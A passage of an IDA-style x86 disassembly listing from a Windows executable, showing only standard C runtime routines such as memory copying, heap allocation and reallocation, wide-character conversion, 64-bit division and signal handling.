or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_40D8E6: ; CODE XREF: sub_40D8AC+27j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_40D8AC endp
; =============== S U B R O U T I N E =======================================
sub_40D8F0 proc near ; CODE XREF: sub_406B86+91p
; sub_408ACB+Cp ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_40D907
call sub_405B83
mov dword ptr [eax], 9
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40D907: ; CODE XREF: sub_40D8F0+7j
push esi
xor esi, esi
cmp eax, esi
jl short loc_40D916
cmp eax, dword_435808
jb short loc_40D932
loc_40D916: ; CODE XREF: sub_40D8F0+1Cj
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 9
call sub_403305
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40D932: ; CODE XREF: sub_40D8F0+24j
mov ecx, eax
and eax, 1Fh
imul eax, 28h
sar ecx, 5
mov ecx, dword_435820[ecx*4]
movzx eax, byte ptr [ecx+eax+4]
and eax, 40h
pop esi
retn
sub_40D8F0 endp
; =============== S U B R O U T I N E =======================================
sub_40D94E proc near ; CODE XREF: sub_407D29:loc_407D4Cp
push esi
push edi
xor edi, edi
loc_40D952: ; CODE XREF: sub_40D94E+1Aj
lea esi, off_423F80[edi]
push dword ptr [esi]
call sub_4054D7
add edi, 4
cmp edi, 28h
pop ecx
mov [esi], eax
jb short loc_40D952
pop edi
pop esi
retn
sub_40D94E endp
; =============== S U B R O U T I N E =======================================
sub_40D96D proc near ; CODE XREF: sub_406D87+554p
mov eax, dword_423064
or eax, 1
xor ecx, ecx
cmp dword_427F80, eax
setz cl
mov eax, ecx
retn
sub_40D96D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D983 proc near ; CODE XREF: sub_40DAE2+12p
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = word ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
push edi
mov edi, [ebp+arg_8]
jnz short loc_40D9A9
cmp edi, ebx
jbe short loc_40D9A9
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40D9A5
mov [eax], ebx
loc_40D9A5: ; CODE XREF: sub_40D983+1Ej
; sub_40D983+ECj ...
xor eax, eax
jmp short loc_40DA28
; ---------------------------------------------------------------------------
loc_40D9A9: ; CODE XREF: sub_40D983+13j
; sub_40D983+17j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40D9B3
or dword ptr [eax], 0FFFFFFFFh
loc_40D9B3: ; CODE XREF: sub_40D983+2Bj
cmp edi, 7FFFFFFFh
jbe short loc_40D9D6
call sub_405B83
push 16h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_403305
add esp, 14h
loc_40D9D2: ; CODE XREF: sub_40D983+CCj
; sub_40D983+D5j
mov eax, esi
jmp short loc_40DA28
; ---------------------------------------------------------------------------
loc_40D9D6: ; CODE XREF: sub_40D983+36j
push [ebp+arg_10]
lea ecx, [ebp+var_10]
call sub_402AEB
mov eax, [ebp+var_10]
cmp [eax+14h], ebx
jnz loc_40DA81
mov ax, [ebp+arg_C]
cmp ax, 0FFh
jbe short loc_40DA2D
cmp esi, ebx
jz short loc_40DA0A
cmp edi, ebx
jbe short loc_40DA0A
push edi
push ebx
push esi
call sub_407F20
add esp, 0Ch
loc_40DA0A: ; CODE XREF: sub_40D983+76j
; sub_40D983+7Aj ...
call sub_405B83
mov dword ptr [eax], 2Ah
call sub_405B83
cmp [ebp+var_4], bl
mov eax, [eax]
jz short loc_40DA28
mov ecx, [ebp+var_8]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40DA28: ; CODE XREF: sub_40D983+24j
; sub_40D983+51j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_40DA2D: ; CODE XREF: sub_40D983+72j
cmp esi, ebx
jz short loc_40DA5F
cmp edi, ebx
ja short loc_40DA5D
loc_40DA35: ; CODE XREF: sub_40D983+141j
; sub_40D983+149j ...
call sub_405B83
push 22h
pop esi
push ebx
push ebx
push ebx
push ebx
push ebx
mov [eax], esi
call sub_403305
add esp, 14h
cmp [ebp+var_4], bl
jz short loc_40D9D2
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
jmp loc_40D9D2
; ---------------------------------------------------------------------------
loc_40DA5D: ; CODE XREF: sub_40D983+B0j
mov [esi], al
loc_40DA5F: ; CODE XREF: sub_40D983+ACj
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_40DA6C
mov dword ptr [eax], 1
loc_40DA6C: ; CODE XREF: sub_40D983+E1j
; sub_40D983+12Aj ...
cmp [ebp+var_4], bl
jz loc_40D9A5
mov eax, [ebp+var_8]
and dword ptr [eax+70h], 0FFFFFFFDh
jmp loc_40D9A5
; ---------------------------------------------------------------------------
loc_40DA81: ; CODE XREF: sub_40D983+64j
lea ecx, [ebp+arg_4]
push ecx
push ebx
push edi
push esi
push 1
lea ecx, [ebp+arg_C]
push ecx
push ebx
mov [ebp+arg_4], ebx
push dword ptr [eax+4]
call ds:dword_41D134 ; WideCharToMultiByte
cmp eax, ebx
jz short loc_40DAB3
cmp [ebp+arg_4], ebx
jnz loc_40DA0A
mov ecx, [ebp+arg_0]
cmp ecx, ebx
jz short loc_40DA6C
mov [ecx], eax
jmp short loc_40DA6C
; ---------------------------------------------------------------------------
loc_40DAB3: ; CODE XREF: sub_40D983+11Aj
call ds:dword_41D0EC ; RtlGetLastWin32Error
cmp eax, 7Ah
jnz loc_40DA0A
cmp esi, ebx
jz loc_40DA35
cmp edi, ebx
jbe loc_40DA35
push edi
push ebx
push esi
call sub_407F20
add esp, 0Ch
jmp loc_40DA35
sub_40D983 endp
; =============== S U B R O U T I N E =======================================
sub_40DAE2 proc near ; CODE XREF: sub_406D87+487p
; sub_406D87+8B1p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push 0
push [esp+4+arg_C]
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_40D983
add esp, 14h
retn
sub_40DAE2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40DB00 proc near ; CODE XREF: sub_406D87+786p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_40DB31
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_40DB78
; ---------------------------------------------------------------------------
loc_40DB31: ; CODE XREF: sub_40DB00+7j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_40DB3F: ; CODE XREF: sub_40DB00+49j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_40DB3F
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_40DB6D
cmp edx, [esp+4+arg_4]
ja short loc_40DB6D
jb short loc_40DB76
cmp eax, [esp+4+arg_0]
jbe short loc_40DB76
loc_40DB6D: ; CODE XREF: sub_40DB00+5Dj
; sub_40DB00+63j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_40DB76: ; CODE XREF: sub_40DB00+65j
; sub_40DB00+6Bj
xor ebx, ebx
loc_40DB78: ; CODE XREF: sub_40DB00+2Fj
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_40DB00 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DB95 proc near ; CODE XREF: sub_40DC1C+4Dp
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_4], edi
mov [ebp+var_8], esi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
shr ecx, 7
jmp short loc_40DBB5
; ---------------------------------------------------------------------------
db 8Dh, 9Bh, 4 dup(0)
; ---------------------------------------------------------------------------
loc_40DBB5: ; CODE XREF: sub_40DB95+18j
; sub_40DB95+7Bj
movdqa xmm0, oword ptr [esi]
movdqa xmm1, oword ptr [esi+10h]
movdqa xmm2, oword ptr [esi+20h]
movdqa xmm3, oword ptr [esi+30h]
movdqa oword ptr [edi], xmm0
movdqa oword ptr [edi+10h], xmm1
movdqa oword ptr [edi+20h], xmm2
movdqa oword ptr [edi+30h], xmm3
movdqa xmm4, oword ptr [esi+40h]
movdqa xmm5, oword ptr [esi+50h]
movdqa xmm6, oword ptr [esi+60h]
movdqa xmm7, oword ptr [esi+70h]
movdqa oword ptr [edi+40h], xmm4
movdqa oword ptr [edi+50h], xmm5
movdqa oword ptr [edi+60h], xmm6
movdqa oword ptr [edi+70h], xmm7
lea esi, [esi+80h]
lea edi, [edi+80h]
dec ecx
jnz short loc_40DBB5
mov esi, [ebp+var_8]
mov edi, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_40DB95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DC1C proc near ; CODE XREF: sub_407720+42j
; sub_407FA0+42j ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_C], edi
mov [ebp+var_8], esi
mov [ebp+var_4], ebx
mov ebx, [ebp+arg_4]
mov eax, ebx
cdq
mov ecx, eax
mov eax, [ebp+arg_0]
xor ecx, edx
sub ecx, edx
and ecx, 0Fh
xor ecx, edx
sub ecx, edx
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
mov edx, ecx
or edx, edi
jnz short loc_40DC9F
mov esi, [ebp+arg_8]
mov ecx, esi
and ecx, 7Fh
mov [ebp+var_18], ecx
cmp esi, ecx
jz short loc_40DC77
sub esi, ecx
push esi
push ebx
push eax
call sub_40DB95
add esp, 0Ch
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_18]
loc_40DC77: ; CODE XREF: sub_40DC1C+46j
test ecx, ecx
jz short loc_40DCF2
mov ebx, [ebp+arg_8]
mov edx, [ebp+arg_4]
add edx, ebx
sub edx, ecx
mov [ebp+var_14], edx
add ebx, eax
sub ebx, ecx
mov [ebp+var_10], ebx
mov esi, [ebp+var_14]
mov edi, [ebp+var_10]
mov ecx, [ebp+var_18]
rep movsb
mov eax, [ebp+arg_0]
jmp short loc_40DCF2
; ---------------------------------------------------------------------------
loc_40DC9F: ; CODE XREF: sub_40DC1C+37j
cmp ecx, edi
jnz short loc_40DCD8
neg ecx
add ecx, 10h
mov [ebp+var_1C], ecx
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+var_1C]
rep movsb
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_1C]
mov edx, [ebp+arg_4]
add edx, [ebp+var_1C]
mov eax, [ebp+arg_8]
sub eax, [ebp+var_1C]
push eax
push edx
push ecx
call sub_40DC1C
add esp, 0Ch
mov eax, [ebp+arg_0]
jmp short loc_40DCF2
; ---------------------------------------------------------------------------
loc_40DCD8: ; CODE XREF: sub_40DC1C+85j
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_0]
mov ecx, [ebp+arg_8]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+arg_0]
loc_40DCF2: ; CODE XREF: sub_40DC1C+5Dj
; sub_40DC1C+81j ...
mov ebx, [ebp+var_4]
mov esi, [ebp+var_8]
mov edi, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_40DC1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DCFF proc near ; CODE XREF: sub_407B2A+Ep
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0040DE04 SIZE 00000019 BYTES
push 0Ch
push offset dword_421B20
call __SEH_prolog4
mov ecx, [ebp+arg_0]
xor edi, edi
cmp ecx, edi
jbe short loc_40DD42
push 0FFFFFFE0h
pop eax
xor edx, edx
div ecx
cmp eax, [ebp+arg_4]
sbb eax, eax
inc eax
jnz short loc_40DD42
call sub_405B83
mov dword ptr [eax], 0Ch
push edi
push edi
push edi
push edi
push edi
call sub_403305
add esp, 14h
loc_40DD3B: ; CODE XREF: sub_40DCFF+E6j
; sub_40DCFF+F2j
xor eax, eax
jmp loc_40DE17
; ---------------------------------------------------------------------------
loc_40DD42: ; CODE XREF: sub_40DCFF+13j
; sub_40DCFF+22j
imul ecx, [ebp+arg_4]
mov esi, ecx
mov [ebp+arg_0], esi
cmp esi, edi
jnz short loc_40DD52
xor esi, esi
inc esi
loc_40DD52: ; CODE XREF: sub_40DCFF+4Ej
; sub_40DCFF+DBj
xor ebx, ebx
mov [ebp+var_1C], ebx
cmp esi, 0FFFFFFE0h
ja short loc_40DDC5
cmp dword_436974, 3
jnz short loc_40DDB0
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
mov eax, [ebp+arg_0]
cmp eax, dword_436964
ja short loc_40DDB0
push 4
call sub_405DA7
pop ecx
mov [ebp+ms_exc.disabled], edi
push [ebp+arg_0]
call sub_4066A9
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40DDFB
mov ebx, [ebp+var_1C]
cmp ebx, edi
jz short loc_40DDB4
push [ebp+arg_0]
push edi
push ebx
call sub_407F20
add esp, 0Ch
loc_40DDB0: ; CODE XREF: sub_40DCFF+64j
; sub_40DCFF+78j
cmp ebx, edi
jnz short loc_40DE15
loc_40DDB4: ; CODE XREF: sub_40DCFF+A2j
push esi
push 8
push dword_427AC8
call ds:dword_41D110 ; RtlAllocateHeap
mov ebx, eax
loc_40DDC5: ; CODE XREF: sub_40DCFF+5Bj
cmp ebx, edi
jnz short loc_40DE15
cmp dword_427E4C, edi
jz short loc_40DE04
push esi
call sub_408412
pop ecx
test eax, eax
jnz loc_40DD52
mov eax, [ebp+arg_8]
cmp eax, edi
jz loc_40DD3B
mov dword ptr [eax], 0Ch
jmp loc_40DD3B
sub_40DCFF endp
; =============== S U B R O U T I N E =======================================
sub_40DDF6 proc near ; DATA XREF: fabskl8p:00421B38o
xor edi, edi
mov esi, [ebp+0Ch]
sub_40DDF6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DDFB proc near ; CODE XREF: sub_40DCFF+98p
push 4
call sub_405CCF
pop ecx
retn
sub_40DDFB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40DCFF
loc_40DE04: ; CODE XREF: sub_40DCFF+D0j
cmp ebx, edi
jnz short loc_40DE15
mov eax, [ebp+arg_8]
cmp eax, edi
jz short loc_40DE15
mov dword ptr [eax], 0Ch
loc_40DE15: ; CODE XREF: sub_40DCFF+B3j
; sub_40DCFF+C8j ...
mov eax, ebx
loc_40DE17: ; CODE XREF: sub_40DCFF+3Ej
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_40DCFF
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DE1D proc near ; CODE XREF: sub_407B72+Cp
; sub_40E038+3Ep
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0040DF6A SIZE 000000CE BYTES
push 10h
push offset dword_421B40
call __SEH_prolog4
mov ebx, [ebp+arg_0]
test ebx, ebx
jnz short loc_40DE3E
push [ebp+arg_4]
call sub_403AAC
pop ecx
jmp loc_40E00A
; ---------------------------------------------------------------------------
loc_40DE3E: ; CODE XREF: sub_40DE1D+11j
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_40DE51
push ebx
call sub_4039CF
pop ecx
jmp loc_40E008
; ---------------------------------------------------------------------------
loc_40DE51: ; CODE XREF: sub_40DE1D+26j
cmp dword_436974, 3
jnz loc_40DFF1
loc_40DE5E: ; CODE XREF: sub_40DE1D+169j
xor edi, edi
mov [ebp+var_1C], edi
cmp esi, 0FFFFFFE0h
ja loc_40DFF6
push 4
call sub_405DA7
pop ecx
mov [ebp+ms_exc.disabled], edi
push ebx
call sub_405ED5
pop ecx
mov [ebp+var_20], eax
cmp eax, edi
jz loc_40DF27
cmp esi, dword_436964
ja short loc_40DEDA
push esi
push ebx
push eax
call sub_4063CA
add esp, 0Ch
test eax, eax
jz short loc_40DEA5
mov [ebp+var_1C], ebx
jmp short loc_40DEDA
; ---------------------------------------------------------------------------
loc_40DEA5: ; CODE XREF: sub_40DE1D+81j
push esi
call sub_4066A9
pop ecx
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_40DEDA
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_40DEBD
mov eax, esi
loc_40DEBD: ; CODE XREF: sub_40DE1D+9Cj
push eax
push ebx
push [ebp+var_1C]
call sub_407FA0
push ebx
call sub_405ED5
mov [ebp+var_20], eax
push ebx
push eax
call sub_405F00
add esp, 18h
loc_40DEDA: ; CODE XREF: sub_40DE1D+72j
; sub_40DE1D+86j ...
cmp [ebp+var_1C], edi
jnz short loc_40DF27
cmp esi, edi
jnz short loc_40DEE9
xor esi, esi
inc esi
mov [ebp+arg_4], esi
loc_40DEE9: ; CODE XREF: sub_40DE1D+C4j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push dword_427AC8
call ds:dword_41D110 ; RtlAllocateHeap
mov [ebp+var_1C], eax
cmp eax, edi
jz short loc_40DF27
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_40DF11
mov eax, esi
loc_40DF11: ; CODE XREF: sub_40DE1D+F0j
push eax
push ebx
push [ebp+var_1C]
call sub_407FA0
push ebx
push [ebp+var_20]
call sub_405F00
add esp, 14h
loc_40DF27: ; CODE XREF: sub_40DE1D+66j
; sub_40DE1D+C0j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40DF61
cmp [ebp+var_20], 0
jnz short loc_40DF6A
test esi, esi
jnz short loc_40DF3E
inc esi
loc_40DF3E: ; CODE XREF: sub_40DE1D+11Ej
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push 0
push dword_427AC8
call ds:off_41D150
mov edi, eax
jmp short loc_40DF6D
sub_40DE1D endp
; =============== S U B R O U T I N E =======================================
sub_40DF5B proc near ; DATA XREF: fabskl8p:00421B58o
mov esi, [ebp+0Ch]
mov ebx, [ebp+8]
sub_40DF5B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40DF61 proc near ; CODE XREF: sub_40DE1D+111p
push 4
call sub_405CCF
pop ecx
retn
sub_40DF61 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40DE1D
loc_40DF6A: ; CODE XREF: sub_40DE1D+11Aj
mov edi, [ebp+var_1C]
loc_40DF6D: ; CODE XREF: sub_40DE1D+13Cj
test edi, edi
jnz loc_40E034
cmp dword_427E4C, edi
jz short loc_40DFA9
push esi
call sub_408412
pop ecx
test eax, eax
jnz loc_40DE5E
call sub_405B83
cmp [ebp+var_20], edi
jnz short loc_40E002
loc_40DF96: ; CODE XREF: sub_40DE1D+1F8j
mov esi, eax
call ds:dword_41D0EC ; RtlGetLastWin32Error
push eax
call sub_405B48
pop ecx
mov [esi], eax
jmp short loc_40E008
; ---------------------------------------------------------------------------
loc_40DFA9: ; CODE XREF: sub_40DE1D+15Ej
test edi, edi
jnz loc_40E034
call sub_405B83
cmp [ebp+var_20], edi
jz short loc_40E023
mov dword ptr [eax], 0Ch
jmp short loc_40E034
; ---------------------------------------------------------------------------
loc_40DFC3: ; CODE XREF: sub_40DE1D+1D7j
test esi, esi
jnz short loc_40DFC8
inc esi
loc_40DFC8: ; CODE XREF: sub_40DE1D+1A8j
push esi
push ebx
push 0
push dword_427AC8
call ds:off_41D150
mov edi, eax
test edi, edi
jnz short loc_40E034
cmp dword_427E4C, eax
jz short loc_40E01A
push esi
call sub_408412
pop ecx
test eax, eax
jz short loc_40E010
loc_40DFF1: ; CODE XREF: sub_40DE1D+3Bj
cmp esi, 0FFFFFFE0h
jbe short loc_40DFC3
loc_40DFF6: ; CODE XREF: sub_40DE1D+49j
push esi
call sub_408412
pop ecx
call sub_405B83
loc_40E002: ; CODE XREF: sub_40DE1D+177j
mov dword ptr [eax], 0Ch
loc_40E008: ; CODE XREF: sub_40DE1D+2Fj
; sub_40DE1D+18Aj
xor eax, eax
loc_40E00A: ; CODE XREF: sub_40DE1D+1Cj
; sub_40DE1D+219j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_40E010: ; CODE XREF: sub_40DE1D+1D2j
call sub_405B83
jmp loc_40DF96
; ---------------------------------------------------------------------------
loc_40E01A: ; CODE XREF: sub_40DE1D+1C7j
test edi, edi
jnz short loc_40E034
call sub_405B83
loc_40E023: ; CODE XREF: sub_40DE1D+19Cj
mov esi, eax
call ds:dword_41D0EC ; RtlGetLastWin32Error
push eax
call sub_405B48
mov [esi], eax
pop ecx
loc_40E034: ; CODE XREF: sub_40DE1D+152j
; sub_40DE1D+18Ej ...
mov eax, edi
jmp short loc_40E00A
; END OF FUNCTION CHUNK FOR sub_40DE1D
; =============== S U B R O U T I N E =======================================
sub_40E038 proc near ; CODE XREF: sub_407BBD+10p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_4]
push esi
xor esi, esi
cmp ecx, esi
jbe short loc_40E06C
push 0FFFFFFE0h
xor edx, edx
pop eax
div ecx
cmp eax, [esp+4+arg_8]
jnb short loc_40E06C
call sub_405B83
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 0Ch
call sub_403305
add esp, 14h
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_40E06C: ; CODE XREF: sub_40E038+9j
; sub_40E038+16j
imul ecx, [esp+4+arg_8]
push ecx
push [esp+8+arg_0]
call sub_40DE1D
pop ecx
pop ecx
pop esi
retn
sub_40E038 endp
; =============== S U B R O U T I N E =======================================
sub_40E07F proc near ; CODE XREF: sub_407EC9+27p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_427F84, eax
mov dword_427F88, eax
mov dword_427F8C, eax
mov dword_427F90, eax
retn
sub_40E07F endp
; =============== S U B R O U T I N E =======================================
sub_40E098 proc near ; CODE XREF: sub_40E0D9+5Ap
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, dword_423E44
push esi
loc_40E0A3: ; CODE XREF: sub_40E098+1Ej
cmp [eax+4], edx
jz short loc_40E0B8
mov esi, ecx
imul esi, 0Ch
add esi, [esp+4+arg_0]
add eax, 0Ch
cmp eax, esi
jb short loc_40E0A3
loc_40E0B8: ; CODE XREF: sub_40E098+Ej
imul ecx, 0Ch
add ecx, [esp+4+arg_0]
pop esi
cmp eax, ecx
jnb short loc_40E0C9
cmp [eax+4], edx
jz short locret_40E0CB
loc_40E0C9: ; CODE XREF: sub_40E098+2Aj
xor eax, eax
locret_40E0CB: ; CODE XREF: sub_40E098+2Fj
retn
sub_40E098 endp
; =============== S U B R O U T I N E =======================================
sub_40E0CC proc near ; CODE XREF: sub_41056E:loc_41059Bp
push dword_427F8C
call sub_405543
pop ecx
retn
sub_40E0CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E0D9 proc near ; CODE XREF: sub_41056E+38p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0040E283 SIZE 00000006 BYTES
push 20h
push offset dword_421B60
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_28], edi
mov ebx, [ebp+arg_0]
cmp ebx, 0Bh
jg short loc_40E141
jz short loc_40E10C
mov eax, ebx
push 2
pop ecx
sub eax, ecx
jz short loc_40E122
sub eax, ecx
jz short loc_40E10C
sub eax, ecx
jz short loc_40E16C
sub eax, ecx
jnz short loc_40E150
loc_40E10C: ; CODE XREF: sub_40E0D9+1Cj
; sub_40E0D9+29j
call sub_4056CA
mov edi, eax
mov [ebp+var_28], edi
test edi, edi
jnz short loc_40E12E
loc_40E11A: ; CODE XREF: sub_40E0D9+91j
or eax, 0FFFFFFFFh
jmp loc_40E283
; ---------------------------------------------------------------------------
loc_40E122: ; CODE XREF: sub_40E0D9+25j
mov esi, offset dword_427F84
mov eax, dword_427F84
jmp short loc_40E18E
; ---------------------------------------------------------------------------
loc_40E12E: ; CODE XREF: sub_40E0D9+3Fj
push dword ptr [edi+5Ch]
mov edx, ebx
call sub_40E098
mov esi, eax
add esi, 8
mov eax, [esi]
jmp short loc_40E19B
; ---------------------------------------------------------------------------
loc_40E141: ; CODE XREF: sub_40E0D9+1Aj
mov eax, ebx
sub eax, 0Fh
jz short loc_40E184
sub eax, 6
jz short loc_40E178
dec eax
jz short loc_40E16C
loc_40E150: ; CODE XREF: sub_40E0D9+31j
call sub_405B83
mov dword ptr [eax], 16h
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_403305
add esp, 14h
jmp short loc_40E11A
; ---------------------------------------------------------------------------
loc_40E16C: ; CODE XREF: sub_40E0D9+2Dj
; sub_40E0D9+75j
mov esi, offset dword_427F8C
mov eax, dword_427F8C
jmp short loc_40E18E
; ---------------------------------------------------------------------------
loc_40E178: ; CODE XREF: sub_40E0D9+72j
mov esi, offset dword_427F88
mov eax, dword_427F88
jmp short loc_40E18E
; ---------------------------------------------------------------------------
loc_40E184: ; CODE XREF: sub_40E0D9+6Dj
mov esi, offset dword_427F90
mov eax, dword_427F90
loc_40E18E: ; CODE XREF: sub_40E0D9+53j
; sub_40E0D9+9Dj ...
mov [ebp+var_1C], 1
push eax
call sub_405543
loc_40E19B: ; CODE XREF: sub_40E0D9+66j
mov [ebp+var_20], eax
pop ecx
xor eax, eax
cmp [ebp+var_20], 1
jz loc_40E283
cmp [ebp+var_20], eax
jnz short loc_40E1B7
push 3
call sub_407E9A
loc_40E1B7: ; CODE XREF: sub_40E0D9+D5j
cmp [ebp+var_1C], eax
jz short loc_40E1C3
push eax
call sub_405DA7
pop ecx
loc_40E1C3: ; CODE XREF: sub_40E0D9+E1j
xor eax, eax
mov [ebp+ms_exc.disabled], eax
cmp ebx, 8
jz short loc_40E1D7
cmp ebx, 0Bh
jz short loc_40E1D7
cmp ebx, 4
jnz short loc_40E1F2
loc_40E1D7: ; CODE XREF: sub_40E0D9+F2j
; sub_40E0D9+F7j
mov ecx, [edi+60h]
mov [ebp+var_2C], ecx
mov [edi+60h], eax
cmp ebx, 8
jnz short loc_40E225
mov ecx, [edi+64h]
mov [ebp+var_30], ecx
mov dword ptr [edi+64h], 8Ch
loc_40E1F2: ; CODE XREF: sub_40E0D9+FCj
cmp ebx, 8
jnz short loc_40E225
mov ecx, dword_423E38
mov [ebp+var_24], ecx
loc_40E200: ; CODE XREF: sub_40E0D9+14Aj
mov ecx, dword_423E3C
mov edx, dword_423E38
add ecx, edx
cmp [ebp+var_24], ecx
jge short loc_40E22C
mov ecx, [ebp+var_24]
imul ecx, 0Ch
mov edx, [edi+5Ch]
mov [ecx+edx+8], eax
inc [ebp+var_24]
jmp short loc_40E200
; ---------------------------------------------------------------------------
loc_40E225: ; CODE XREF: sub_40E0D9+10Aj
; sub_40E0D9+11Cj
call sub_40553A
mov [esi], eax
loc_40E22C: ; CODE XREF: sub_40E0D9+138j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40E24D
cmp ebx, 8
jnz short sub_40E25C
push dword ptr [edi+64h]
push ebx
call [ebp+var_20]
pop ecx
jmp short loc_40E260
sub_40E0D9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40E247 proc near ; DATA XREF: fabskl8p:00421B78o
mov ebx, [ebp+8]
mov edi, [ebp-28h]
sub_40E247 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
